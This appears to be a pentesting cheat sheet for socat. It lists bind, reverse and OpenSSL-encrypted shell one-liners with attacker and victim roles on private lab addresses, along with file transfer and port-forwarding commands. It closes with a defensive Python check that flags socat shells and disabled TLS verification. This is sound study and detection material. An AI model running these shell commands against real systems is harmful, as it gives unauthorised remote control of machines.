Socat

Socat relays data in both directions between a sender and a receiver.

It also supports transferring data between those two channels independently.

The data channels used by socat can take any of the following forms:

  • A file or an executable program

  • File descriptor (0 - STDIN, 1 - STDOUT, 2 - STDERR)

  • Pipe

  • Serial port communication with a device

  • Sockets (RAW, TCP, UDP, IPv4, IPv6, UNIX)

  • SSL sockets (socket data + SSL encryption)

  • CONNECT with a proxy

Socat is similar to Netcat, but it supports some additional features, such as:

  • Multiple connections

  • Use of secure protocols (OpenSSL, Sockets, VPN Tunnel, SCTP)

BIND SHELL

VICTIM

socat tcp4-listen:5555 exec:/bin/bash

ATTACKER

socat - tcp4-connect:192.168.116.129:5555

REVERSE SHELL

ATTACKER

socat tcp4-listen:5555 STDOUT

VICTIM

socat tcp-connect:192.168.116.128:5555 exec:/bin/bash

ENCRYPTED BIND SHELL

VICTIM

openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 365 -out shell.crt
cat shell.key shell.crt > shell.pem
socat openssl-listen:5555,cert=shell.pem,verify=0,fork exec:/bin/bash

ATTACKER

socat - openssl:192.168.116.129:5555,verify=0

ENCRYPTED REVERSE SHELL

ATTACKER

openssl req -newkey rsa:2048 -nodes -keyout kali_shell.key -x509 -days 365 -out kali_shell.crt
cat kali_shell.key kali_shell.crt > kali_shell.pem
socat openssl-listen:5555,cert=kali_shell.pem,verify=0,fork STDOUT

VICTIM

socat openssl:192.168.116.128:5555,verify=0 exec:/bin/bash

FILE TRANSFER

ATTACKER

socat tcp-listen:5555,fork file:transfer_file.txt

VICTIM

socat tcp-connect:192.168.116.128:5555 file:data.txt,create

PORT FORWARDING

# Apache Server - Port 80
sudo socat tcp-listen:5555,reuseaddr,fork tcp:127.0.0.1:80 &

RUNNING ELF BINARIES IN SERVER

socat tcp-listen:5000,reuseaddr,fork exec:"./sample",pty,stderr
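
A defender-side check for the patterns on this page, added here as an example (not part of the original page): it parses recorded socat command lines and flags a network address paired with exec/system, plus TLS run with verify=0. The sample lines are constructed from the commands above; the function names and finding labels are this example's own.

```python
import shlex

# socat address-type prefixes; covers tcp4-listen, tcp-connect, openssl-listen...
NET_PREFIXES = ("tcp", "udp", "sctp", "openssl", "ssl")
EXEC_TYPES = {"exec", "system"}
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}

# Constructed sample: argv strings as a process-audit source might record them,
# taken from the commands shown on this page.
SAMPLES = [
    "socat tcp4-listen:5555 exec:/bin/bash",
    "socat openssl:192.168.116.128:5555,verify=0 exec:/bin/bash",
    'socat tcp-listen:5000,reuseaddr,fork exec:"./sample",pty,stderr',
    "socat tcp-listen:5555,reuseaddr,fork tcp:127.0.0.1:80",
]


def parse_address(addr):
    """Split 'type:param,opt,...' into (type, param, [opts])."""
    kind, _, rest = addr.partition(":")
    param, *opts = rest.split(",")
    return kind.lower(), param, [o.lower() for o in opts]


def classify(cmdline):
    """Return sorted finding labels (this example's own names) for one argv."""
    argv = shlex.split(cmdline)  # also strips the quotes around exec:"..."
    if len(argv) < 3 or not argv[0].endswith("socat"):
        return []
    addrs = [parse_address(a) for a in argv[-2:]]  # socat [options] addr1 addr2
    net = [a for a in addrs if a[0].startswith(NET_PREFIXES)]
    run = [a for a in addrs if a[0] in EXEC_TYPES]
    findings = set()
    if net and run:
        listening = net[0][0].endswith(("-listen", "-l"))
        words = run[0][1].split()
        program = words[0].rsplit("/", 1)[-1] if words else ""
        if program in SHELLS:
            findings.add("bind-shell" if listening else "reverse-shell")
        else:
            findings.add("network-exec")
    if any("verify=0" in a[2] for a in net):
        findings.add("tls-verify-disabled")
    return sorted(findings)


if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line) or ["no finding"], line)
```

This matches on the recorded argv only, so pair it with listening-socket and parent-process telemetry rather than relying on it alone.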
